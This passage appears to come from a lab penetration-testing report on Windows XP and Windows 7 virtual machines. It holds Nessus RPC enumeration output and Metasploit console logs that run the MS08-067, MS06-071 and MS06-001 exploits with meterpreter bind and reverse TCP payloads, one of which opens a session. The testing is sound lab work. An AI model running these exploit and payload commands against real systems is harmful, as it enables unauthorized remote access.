Object UUID : 00000000-0000-0000-0000-000000000000 UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0 Description : Unknown RPC service Annotation : KeyIso Type : Local RPC service Named pipe : LRPC-04dfdd309d86a33c86 Object UUID : 00000000-0000-0000-0000-000000000000 UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0 Description : Unknown RPC service Annotation : KeyIso Type : Local RPC service Named pipe : audit Object UUID : 00000000-0000-0000-0000-000000000000 UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0 Description : Unknown RPC service Annotation : KeyIso Type : Local RPC service Named pipe : securityevent Object UUID : 00000000-0000-0000-0000-000000000000 UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0 Description : Unknown RPC service Annotation : KeyIso Type : Local RPC service Named pipe : LSARPC_ENDPOINT Object UUID : 00000000-0000-0000-0000-000000000000 UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0 Description : Unknown RPC service Annotation : KeyIso Type : Local RPC service Named pipe : lsapolicylookup Object UUID : 00000000-0000-0000-0000-000000000000 UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0 Description : Unknown RPC service Annotation : KeyIso Type : Local RPC service Named pipe : lsasspirpc

PAGE | 46

Object UUID : 00000000-0000-0000-0000-000000000000 UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0 Description : Unknown RPC service Annotation : KeyIso Type : Local RPC service Named pipe : protected_storage Object UUID : 00000000-0000-0000-0000-000000000000 UUID : b25a52bf-e5dd-4f4a-aea6-8ca7272a0e86, version 1.0 Description : Unknown RPC service Annotation : KeyIso Type : Local RPC service Named pipe : samss lpc Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 7ea70bcf-48af-4f6a-8968-6a440754d5fa, version 1.0 Description : Unknown RPC service Annotation : NSI server endpoint Type : Local RPC service Named pipe : OLEDFFAAD5DBE1B4928A1CFE1851294 Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 7ea70bcf-48af-4f6a-8968-6a440754d5fa, version 1.0 Description : Unknown RPC service Annotation : NSI server endpoint Type : Local RPC service Named pipe : LRPC-a1978a56cbce044c9e

Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 3473dd4d-2e88-4006-9cba-22570909dd10, version 5.0 Description : Unknown RPC service Annotation : WinHttp Auto-Proxy Service Type : Local RPC service Named pipe : OLEDFFAAD5DBE1B4928A1CFE1851294 Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 3473dd4d-2e88-4006-9cba-22570909dd10, version 5.0 Description : Unknown RPC service Annotation : WinHttp Auto-Proxy Service Type : Local RPC service Named pipe : LRPC-a1978a56cbce044c9e Object UUID : 666f7270-6c69-7365-0000-000000000000 UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 Description : Unknown RPC service Annotation : Impl friendly name

PAGE | 47

Type : Local RPC service Named pipe : IUserProfile2

Object UUID : 6c637067-6569-746e-0000-000000000000 UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 Description : Unknown RPC service Annotation : Impl friendly name Type : Local RPC service Named pipe : IUserProfile2 Object UUID : 24d1f7c7-76af-4f28-9ccd-7f6cb6468601 UUID : 2eb08e3e-639f-4fba-97b1-14f878961076, version 1.0 Description : Unknown RPC service Type : Local RPC service Named pipe : IUserProfile2 Object UUID : 24d1f7c7-76af-4f28-9ccd-7f6cb6468601 UUID : 2eb08e3e-639f-4fba-97b1-14f878961076, version 1.0 Description : Unknown RPC service Type : Local RPC service Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106

Object UUID : 736e6573-0000-0000-0000-000000000000 UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 Description : Unknown RPC service Annotation : Impl friendly name Type : Local RPC service Named pipe : IUserProfile2 Object UUID : 736e6573-0000-0000-0000-000000000000 UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 Description : Unknown RPC service Annotation : Impl friendly name Type : Local RPC service Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106 Object UUID : 736e6573-0000-0000-0000-000000000000 UUID : c9ac6db5-82b7-4e55-ae8a-e464ed7b4277, version 1.0 Description : Unknown RPC service Annotation : Impl friendly name Type : Local RPC service Named pipe : senssvc Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53, version 1.0 Description : Scheduler Service

PAGE | 48

Windows process : svchost.exe Type : Local RPC service Named pipe : IUserProfile2

Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53, version 1.0 Description : Scheduler Service Windows process : svchost.exe Type : Local RPC service Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106 Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53, version 1.0 Description : Scheduler Service Windows process : svchost.exe Type : Local RPC service Named pipe : senssvc

Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0 Description : Scheduler Service Windows process : svchost.exe Type : Local RPC service Named pipe : IUserProfile2 Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0 Description : Scheduler Service Windows process : svchost.exe Type : Local RPC service Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106 Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 1ff70682-0a51-30e8-076d-740be8cee98b, version 1.0 Description : Scheduler Service Windows process : svchost.exe Type : Local RPC service Named pipe : senssvc Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0 Description : Scheduler Service Windows process : svchost.exe Type : Local RPC service Named pipe : IUserProfile2

PAGE | 49

Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 378e52b0-c0a9-11cf-822d-00aa0051e40f, version 1.0 Description : Scheduler Service Windows process : svchost.exe Type : Local RPC service Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106

Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0 Description : Unknown RPC service Type : Local RPC service Named pipe : IUserProfile2 Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0 Description : Unknown RPC service Type : Local RPC service Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106 Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 86d35949-83c9-4044-b424-db363231fd0c, version 1.0 Description : Unknown RPC service Type : Local RPC service Named pipe : senssvc Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0 Description : Unknown RPC service Annotation : IP Transition Configuration endpoint Type : Local RPC service Named pipe : IUserProfile2 Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0 Description : Unknown RPC service Annotation : IP Transition Configuration endpoint Type : Local RPC service Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106

PAGE | 50

Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 552d076a-cb29-4e44-8b6a-d15e59e2c0af, version 1.0 Description : Unknown RPC service Annotation : IP Transition Configuration endpoint Type : Local RPC service Named pipe : senssvc

Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0 Description : Unknown RPC service Annotation : XactSrv service Type : Local RPC service Named pipe : IUserProfile2 Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0 Description : Unknown RPC service Annotation : XactSrv service Type : Local RPC service Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106 Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 98716d03-89ac-44c7-bb8c-285824e51c4a, version 1.0 Description : Unknown RPC service Annotation : XactSrv service Type : Local RPC service Named pipe : senssvc Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 201ef99a-7fa0-444c-9399-19ba84f12a1a, version 1.0 Description : Unknown RPC service Annotation : AppInfo Type : Local RPC service Named pipe : IUserProfile2 Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 201ef99a-7fa0-444c-9399-19ba84f12a1a, version 1.0 Description : Unknown RPC service Annotation : AppInfo Type : Local RPC service Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106 Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 201ef99a-7fa0-444c-9399-19ba84f12a1a, version 1.0 Description : Unknown RPC service Annotation : AppInfo

PAGE | 51

Type : Local RPC service Named pipe : senssvc

Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 5f54ce7d-5b79-4175-8584-cb65313a0e98, version 1.0 Description : Unknown RPC service Annotation : AppInfo Type : Local RPC service Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106 Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 5f54ce7d-5b79-4175-8584-cb65313a0e98, version 1.0 Description : Unknown RPC service Annotation : AppInfo Type : Local RPC service Named pipe : senssvc Object UUID : 00000000-0000-0000-0000-000000000000 UUID : fd7a0523-dc70-43dd-9b2e-9c5ed48225b1, version 1.0 Description : Unknown RPC service Annotation : AppInfo Type : Local RPC service Named pipe : IUserProfile2 Object UUID : 00000000-0000-0000-0000-000000000000 UUID : fd7a0523-dc70-43dd-9b2e-9c5ed48225b1, version 1.0 Description : Unknown RPC service Annotation : AppInfo Type : Local RPC service Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106 Object UUID : 00000000-0000-0000-0000-000000000000 UUID : fd7a0523-dc70-43dd-9b2e-9c5ed48225b1, version 1.0 Description : Unknown RPC service Annotation : AppInfo Type : Local RPC service Named pipe : senssvc Object UUID : 00000000-0000-0000-0000-000000000000

PAGE | 52

UUID : 58e604e8-9adb-4d2e-a464-3b0683fb1480, version 1.0 Description : Unknown RPC service Annotation : AppInfo Type : Local RPC service Named pipe : IUserProfile2 Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 58e604e8-9adb-4d2e-a464-3b0683fb1480, version 1.0 Description : Unknown RPC service Annotation : AppInfo Type : Local RPC service Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106 Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 58e604e8-9adb-4d2e-a464-3b0683fb1480, version 1.0 Description : Unknown RPC service Annotation : AppInfo Type : Local RPC service Named pipe : senssvc Object UUID : 00000000-0000-0000-0000-000000000000 UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0 Description : Unknown RPC service Annotation : IKE/Authip API Type : Local RPC service Named pipe : IUserProfile2 Object UUID : 00000000-0000-0000-0000-000000000000 UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0 Description : Unknown RPC service Annotation : IKE/Authip API Type : Local RPC service Named pipe : OLEB6ACB6682BC14CC9B4CC0F919106 Object UUID : 00000000-0000-0000-0000-000000000000 UUID : a398e520-d59a-4bdd-aa7a-3c1e0303a511, version 1.0 Description : Unknown RPC service Annotation : IKE/Authip API Type : Local RPC service Named pipe : senssvc Object UUID : 00000000-0000-0000-0000-000000000000 UUID : f6beaff7-1e19-4fbb-9f8f-b89e2018337c, version 1.0 Description : Unknown RPC service Annotation : Event log TCPIP Type : Local RPC service

PAGE | 53

Named pipe : eventlog

Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 30adc50c-5cbc-46ce-9a0e-91914789e23c, version 1.0 Description : Unknown RPC service Annotation : NRP server endpoint Type : Local RPC service Named pipe : eventlog Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 30adc50c-5cbc-46ce-9a0e-91914789e23c, version 1.0 Description : Unknown RPC service Annotation : NRP server endpoint Type : Local RPC service Named pipe : AudioClientRpc

Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0 Description : DHCP Client Service Windows process : svchost.exe Annotation : DHCP Client LRPC Endpoint Type : Local RPC service Named pipe : eventlog Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0 Description : DHCP Client Service Windows process : svchost.exe Annotation : DHCP Client LRPC Endpoint Type : Local RPC service Named pipe : AudioClientRpc Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5, version 1.0 Description : DHCP Client Service Windows process : svchost.exe Annotation : DHCP Client LRPC Endpoint Type : Local RPC service Named pipe : Audiosrv

PAGE | 54

Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0 Description : Unknown RPC service Annotation : DHCPv6 Client LRPC Endpoint Type : Local RPC service Named pipe : AudioClientRpc Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0 Description : Unknown RPC service Annotation : DHCPv6 Client LRPC Endpoint Type : Local RPC service Named pipe : Audiosrv Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0 Description : Unknown RPC service Annotation : DHCPv6 Client LRPC Endpoint Type : Local RPC service Named pipe : dhcpcsvc Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6, version 1.0 Description : Unknown RPC service Annotation : DHCPv6 Client LRPC Endpoint Type : Local RPC service Named pipe : dhcpcsvc6

Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 06bba54a-be05-49f9-b0a0-30f790261023, version 1.0

PAGE | 55

Description : Unknown RPC service Annotation : Security Center Type : Local RPC service Named pipe : eventlog

Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 06bba54a-be05-49f9-b0a0-30f790261023, version 1.0 Description : Unknown RPC service Annotation : Security Center Type : Local RPC service Named pipe : AudioClientRpc Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 06bba54a-be05-49f9-b0a0-30f790261023, version 1.0 Description : Unknown RPC service Annotation : Security Center Type : Local RPC service Named pipe : Audiosrv Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 06bba54a-be05-49f9-b0a0-30f790261023, version 1.0 Description : Unknown RPC service Annotation : Security Center Type : Local RPC service Named pipe : dhcpcsvc Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 06bba54a-be05-49f9-b0a0-30f790261023, version 1.0 Description : Unknown RPC service Annotation : Security Center Type : Local RPC service Named pipe : dhcpcsvc6 Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 06bba54a-be05-49f9-b0a0-30f790261023, version 1.0 Description : Unknown RPC service Annotation : Security Center Type : Local RPC service Named pipe : OLEE4C5DBF62E0E4163A84295240E81 Nessus ID : 10736

PAGE | 56

Port rtsp (554/tcp) Port icslap (2869/tcp) Port netbios-ssn (139/tcp) SMB Detection

Synopsis : A file / print sharing service is listening on the remote host. Description : The remote service understands the CIFS (Common Internet File System) or Server Message Block (SMB) protocol, used to provide shared access to files, printers, etc between nodes on a network. Solution : n/a Risk factor : None Plugin output : An SMB server is running on this port. Nessus ID : 11011

PAGE | 57

Port unknown (49299/tcp) DCE Services Enumeration Synopsis : A DCE/RPC service is running on the remote host. Description : By sending a Lookup request to the portmapper (TCP 135 or epmapper PIPE) it was possible to enumerate the Distributed Computing Environment (DCE) services running on the remote port. Using this information it is possible to connect and bind to each service by sending an RPC request to the remote port/pipe. Solution : N/A

Risk factor : None

Plugin output : The following DCERPC services are available on TCP port 49299 : Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 12345678-1234-abcd-ef00-0123456789ab, version 1.0 Description : IPsec Services (Windows XP & 2003) Windows process : lsass.exe Annotation : IPSec Policy agent endpoint Type : Remote RPC service TCP Port : 49299 IP : 192.168.0.171 Object UUID : 00000000-0000-0000-0000-000000000000 UUID : 6b5bdd1e-528c-422c-af8c-a4079be4fe48, version 1.0 Description : Unknown RPC service Annotation : Remote Fw APIs Type : Remote RPC service TCP Port : 49299 IP : 192.168.0.171 Nessus ID : 10736

PAGE | 58

The exploit and payload information was taken from the information dialogs provided within Metasploit 3.3. Following the exploit and payload information are the test results from the remote host testing. Six tests were performed on each virtual machine, and the test process is detailed. For complete installation and setup of Metasploit reference the Vantage Point Computing Policy Document.

Metasploit, specifically the Metasploit Framework is an open-source tool used for penetration testing and signature development. The tool presents nearly endless combinations of exploits and payloads that can be used to test multiple aspects of a remote machine's security. As such, it was used to test penetrable points in both the Windows XP and Windows 7 virtual machines. This was done using the following combination of exploits and payloads.

PENETRATION TESTING (METASPLOIT)

Command: msf > windows/smb/ms08_067_netapi Version: 5888 Platform: Windows Privileged: Yes License: Metasploit Framework License (BSD) Payload information: Space: 400 Avoid: 8 characters Description:

MICROSOFT SERVER SERVICE RELATIVE PATH STACK CORRUPTION

EXPLOITS

This module exploits a parsing flaw in the path canonicalization code of NetAPI32.dll through the Server Service. This module is capable of bypassing NX on some operating systems and service packs. The correct target must be used to prevent the Server Service (along with a dozen others in the same process) from crashing. Windows XP targets seem to handle multiple successful exploitation events, but 2003 targets will often crash or hang on subsequent attempts. This is just the first version of this module, full support for NX bypass on 2003, along with other platforms, is still in development. References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2008-4250

PAGE | 59

Command: msf > windows/browser/ms06_071_xml_core Version: 5773 Platform: Windows Privileged: No License: Metasploit Framework License (BSD) Payload information: Space: 1024

INTERNET EXPLORER XML CORE SERVICES HTTP REQUEST HANDLING

Avoid: 1 character Description: This module exploits a code execution vulnerability in Microsoft XML Core Services which exists in the XMLHTTP ActiveX control. This module is the modified version of http://www.milw0rm.com/exploits/2743 - credit to str0ke. This module has been successfully tested on Windows 2000 SP4, Windows XP SP2, Windows 2003 Server SP0 with IE6 + Microsoft XML Core Services 4.0 SP2. References: http://www.microsoft.com/technet/security/bulletin/MS06-071.mspx http://www.securityfocus.com/bid/20915 http://www.osvdb.org/29425

http://cve.mitre.org/cgi-bin/cvename.cgi?name=2006-5745

PAGE | 60

Version: 7611

Command: msf > windows/browser/ms06_001_wmf_setabortproc

WINDOWS XP/2003/VISTA METAFILE ESCAPE() SETABORTPROC CODE EXECUTION

Platform: Windows Privileged: No License: Metasploit Framework License (BSD) Payload information: Space: 1040

Description:

Avoid: 1 characters

This module exploits a vulnerability in the GDI library included with Windows XP and 2003. This vulnerability uses the 'Escape' metafile function to execute arbitrary code through the SetAbortProc procedure. This module generates a random WMF record stream for each request. References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=2005-4560 http://www.osvdb.org/21987 http://www.microsoft.com/technet/security/bulletin/MS06-001.mspx

http://www.securityfocus.com/bid/16074

http://www.microsoft.com/technet/security/advisory/912840.mspx http://wvware.sourceforge.net/caolan/ora-wmf.html http://www.geocad.ru/new/site/Formats/Graphics/wmf/wmf.txt

PAGE | 61

Command: msf> windows/meterpreter/bind_tcp Version: 7075, $Revision$, 7546 Platform: Windows Arch: x86 Needs Admin: No Total size: 298 Description:

WINDOWS METERPRETER (REFLECTIVE INJECTION), BIND TCP STAGER

PAYLOADS

Listen for a connection, Inject the meterpreter server DLL via the Reflective Dll Injection payload Command: msf> windows/meterpreter/reverse_tcp

WINDOWS METERPRETER (REFLECTIVE INJECTION), REVERSE TCP STAGER

Version: 7217, $Revision$, 7546 Platform: Windows Arch: x86 Needs Admin: No Total size: 290 Description:

Connect back to the attacker, Inject the meterpreter server DLL via the Reflective Dll Injection payload

PAGE | 62

WINDOWS XP
MICROSOFT SERVER SERVICE RELATIVE PATH STACK CORRUPTION

TEST 1

msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp payload => windows/meterpreter/bind_tcp rhost => 192.168.0.166 msf exploit(ms08_067_netapi) > set rhost 192.168.0.166 msf exploit(ms08_067_netapi) > exploit [*] Started bind handler [*] Automatically detecting the target...

WINDOWS METERPRETER (REFLECTIVE INJECTION), BIND TCP STAGER

[*] Fingerprint: Windows XP Service Pack 3 - lang:English [*] Selected Target: Windows XP SP3 English (NX) [*] Triggering the vulnerability... [*] Exploit completed, but no session was created.

payload => windows/meterpreter/reverse_tcp lhost => 192.168.0.166

msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp

WINDOWS METERPRETER (REFLECTIVE INJECTION), REVERSE TCP STAGER

MICROSOFT SERVER SERVICE RELATIVE PATH STACK CORRUPTION

TEST 2

msf exploit(ms08_067_netapi) > set lhost 192.168.0.166 msf exploit(ms08_067_netapi) > exploit [*] Started reverse handler [*] Automatically detecting the target...

[*] Fingerprint: Windows XP Service Pack 3 - lang:English [*] Selected Target: Windows XP SP3 English (NX) [*] Triggering the vulnerability... [*] Exploit completed, but no session was created.

PAGE | 63

msf exploit(ms06_071_xml_core) > set payload windows/meterpreter/bind_tcp payload => windows/meterpreter/bind_tcp rhost => 192.168.0.166 msf exploit(ms06_071_xml_core) > set rhost 192.168.0.166 msf exploit(ms06_071_xml_core) > exploit [*] Exploit running as background job. [*] Started bind handler

WINDOWS METERPRETER (REFLECTIVE INJECTION), BIND TCP STAGER

INTERNET EXPLORER XML CORE SERVICES HTTP REQUEST HANDLING

TEST 3

[] Using URL: http://0.0.0.0:8080/Ylyb4Hd [] Server started.

[*] Local IP: http://192.168.0.196:8080/Ylyb4Hd

msf > use windows/browser/ms06_071_xml_core payload => windows/meterpreter/reverse_tcp lhost => 192.168.0.166

WINDOWS METERPRETER (REFLECTIVE INJECTION), REVERSE TCP STAGER

INTERNET EXPLORER XML CORE SERVICES HTTP REQUEST HANDLING

TEST 4

msf exploit(ms06_071_xml_core) > set payload windows/meterpreter/reverse_tcp msf exploit(ms06_071_xml_core) > set lhost 192.168.0.166 msf exploit(ms06_071_xml_core) > exploit [*] Exploit running as background job. [*] Started reverse handler

[] Using URL: http://0.0.0.0:8080/VCk957jpkpSW6J3 [] Server started.

[*] Local IP: http://192.168.0.196:8080/VCk957jpkpSW6J3

PAGE | 64

WINDOWS XP/2003/VISTA METAFILE ESCAPE() SETABORTPROC CODE EXECUTION msf > use windows/browser/ms06_001_wmf_setabortproc payload => windows/meterpreter/bind_tcp rhost => 192.168.0.166 WINDOWS METERPRETER (REFLECTIVE INJECTION), BIND TCP STAGER msf exploit(ms06_001_wmf_setabortproc) > set payload windows/meterpreter/bind_tcp msf exploit(ms06_001_wmf_setabortproc) > set rhost 192.168.0.166 msf exploit(ms06_001_wmf_setabortproc) > exploit [*] Exploit running as background job. [*] Started bind handler msf exploit(ms06_001_wmf_setabortproc) > [*] Using URL: http://0.0.0.0:8080/I0R0jq7Efcxn08 [*] Server started.

TEST 5

[*] Local IP: http://192.168.0.196:8080/I0R0jq7Efcxn08

TEST 6

msf exploit(ms06_001_wmf_setabortproc) > set rhost 192.168.0.166 msf exploit(ms06_001_wmf_setabortproc) > set lhost 192.168.0.166 msf exploit(ms06_001_wmf_setabortproc) > exploit [*] Exploit running as background job.

PAGE | 65

msf exploit(ms06_001_wmf_setabortproc) > [*] Started reverse handler on port 4444 [*] Server started.

[] Using URL: http://0.0.0.0:8080/c5wMfJ8gXdTk [] Local IP: http://192.168.0.196:8080/c5wMfJ8gXdTk

PAGE | 66

WINDOWS 7
MICROSOFT SERVER SERVICE RELATIVE PATH STACK CORRUPTION

TEST 1

msf > use windows/smb/ms08_067_netapi

WINDOWS METERPRETER (REFLECTIVE INJECTION), BIND TCP STAGER

msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bindtcp [-] The value specified for payload is not valid. payload => windows/meterpreter/bind_tcp rhost => 192.168.0.171 msf exploit(ms08_067_netapi) > set payload windows/meterpreter/bind_tcp msf exploit(ms08_067_netapi) > set rhost 192.168.0.171 msf exploit(ms08_067_netapi) > exploit [*] Started bind handler [*] Automatically detecting the target...

[*] Could not determine the exact language pack

[*] Fingerprint: Windows 7 Professional (Build 7600) - lang:Unknown

[*] Exploit completed, but no session was created.

msf > use windows/smb/ms08_067_netapi

WINDOWS METERPRETER (REFLECTIVE INJECTION), REVERSE TCP STAGER

MICROSOFT SERVER SERVICE RELATIVE PATH STACK CORRUPTION

TEST 2

msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp lhost => 192.168.0.171 msf exploit(ms08_067_netapi) > set lhost 192.168.0.171 msf exploit(ms08_067_netapi) > set rhost 192.168.0.171 rhost => 192.168.0.171

PAGE | 67

msf exploit(ms08_067_netapi) > exploit [*] Automatically detecting the target...

[*] Started reverse handler on port 4444 [*] Fingerprint: Windows 7 Professional (Build 7600) - lang:Unknown

[*] Could not determine the exact language pack

[*] Exploit completed, but no session was created.

msf > use windows/browser/ms06_071_xml_core payload => windows/meterpreter/bind_tcp rhost => 192.168.0.171

WINDOWS METERPRETER (REFLECTIVE INJECTION), BIND TCP STAGER

INTERNET EXPLORER XML CORE SERVICES HTTP REQUEST HANDLING

TEST 3

msf exploit(ms06_071_xml_core) > set payload windows/meterpreter/bind_tcp msf exploit(ms06_071_xml_core) > set rhost 192.168.0.171 msf exploit(ms06_071_xml_core) > exploit [*] Exploit running as background job. msf exploit(ms06_071_xml_core) > [*] Started bind handler [*] Using URL: http://0.0.0.0:8080/H2MNFt9yRjH4N0q

[] Local IP: http://192.168.0.196:8080/H2MNFt9yRjH4N0q [] Server started.

msf exploit(ms06_071_xml_core) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp

msf > use windows/browser/ms06_071_xml_core

WINDOWS METERPRETER (REFLECTIVE INJECTION), REVERSE TCP STAGER

INTERNET EXPLORER XML CORE SERVICES HTTP REQUEST HANDLING

TEST 4

PAGE | 68

msf exploit(ms06_071_xml_core) > set rhost 192.168.0.171 rhost => 192.168.0.171 lhost => 192.168.0.171 msf exploit(ms06_071_xml_core) > set lhost 192.168.0.171 msf exploit(ms06_071_xml_core) > exploit [*] Exploit running as background job. msf exploit(ms06_071_xml_core) > [*] Started reverse handler on port 4444 [*] Using URL: http://0.0.0.0:8080/m8MRYtwpxBsaeP [*] Server started. [*] Local IP: http://192.168.0.196:8080/m8MRYtwpxBsaeP

WINDOWS XP/2003/VISTA METAFILE ESCAPE() SETABORTPROC CODE EXECUTION msf exploit(ms06_001_wmf_setabortproc) > set payload windows/meterpreter/bind_tcp msf > use windows/browser/ms06_001_wmf_setabortproc WINDOWS METERPRETER (REFLECTIVE INJECTION), BIND TCP STAGER

TEST 5

payload => windows/meterpreter/bind_tcp rhost => 192.168.0.171

msf exploit(ms06_001_wmf_setabortproc) > set rhost 192.168.0.171 msf exploit(ms06_001_wmf_setabortproc) > exploit [*] Exploit running as background job. [*] Started bind handler msf exploit(ms06_001_wmf_setabortproc) > [*] Using URL: http://0.0.0.0:8080/LJTnPF9ZUf [*] Server started.

[*] Local IP: http://192.168.0.196:8080/LJTnPF9ZUf

PAGE | 69

[*] Started bind handler

[*] Sending exploit to 192.168.0.196:1199... [*] Sending stage (719360 bytes) [*] Meterpreter session 1 opened (192.168.0.196:1201 -> 192.168.0.196:4444)

PAGE | 70

WINDOWS XP/2003/VISTA METAFILE ESCAPE() SETABORTPROC CODE EXECUTION msf > use windows/browser/ms06_001_wmf_setabortproc payload => windows/meterpreter/reverse_tcp rhost => 192.168.0.171 lhost => 192.168.0.171 WINDOWS METERPRETER (REFLECTIVE INJECTION), REVERSE TCP STAGER msf exploit(ms06_001_wmf_setabortproc) > set payload windows/meterpreter/reverse_tcp msf exploit(ms06_001_wmf_setabortproc) > set rhost 192.168.0.171 msf exploit(ms06_001_wmf_setabortproc) > set lhost 192.168.0.171 msf exploit(ms06_001_wmf_setabortproc) > exploit [*] Exploit running as background job. msf exploit(ms06_001_wmf_setabortproc) > [*] Started reverse handler on port 4444

TEST 6

[] Using URL: http://0.0.0.0:8080/JfNUisgBdnRRa [] Server started.

[*] Local IP: http://192.168.0.196:8080/JfNUisgBdnRRa

[*] Sending exploit to 192.168.0.196:1267...

PAGE | 71

CONCLUSION
As with any scientific test, empirical evidence must be presented in order to draw legitimate conclusions. In addition to this, test results must be corroborated in order to verify authenticity. This is the reason that multiple tools were used to test the security of the two remote machines (the virtual machines). While NMap, Nessus, and Metasploit have different specialties, they are all necessary pieces of a larger puzzle - computer security.

In order to fully verify true security, the tools must be considered together. For instance, basing results strictly on NMap scans would yield the conclusion that Windows XP is far more secure that Windows 7. This would be due to the fact that Windows XP has no unfiltered ports and Windows 7 has seven "open ports." However, the Nessus scan concludes that Windows XP has five open ports and Windows 7 has twelve. Additionally, there are multiple low vulnerabilities present in each operating system. The vulnerabilities present in each operating system have the same underlying processes: Server Message Block (SMB) and Distributed Computing Environment (DCE). SMB is an application-layer protocol that provides shared access to computing resources like files, printers, and ports. Reducing it to the most basic level, it functions as the "Microsoft Windows Network." DCE is a software system that functions as a framework for client/server interactions. The most pertinent aspect is the remote procedure call system which allows work to be performed across multiple computers.

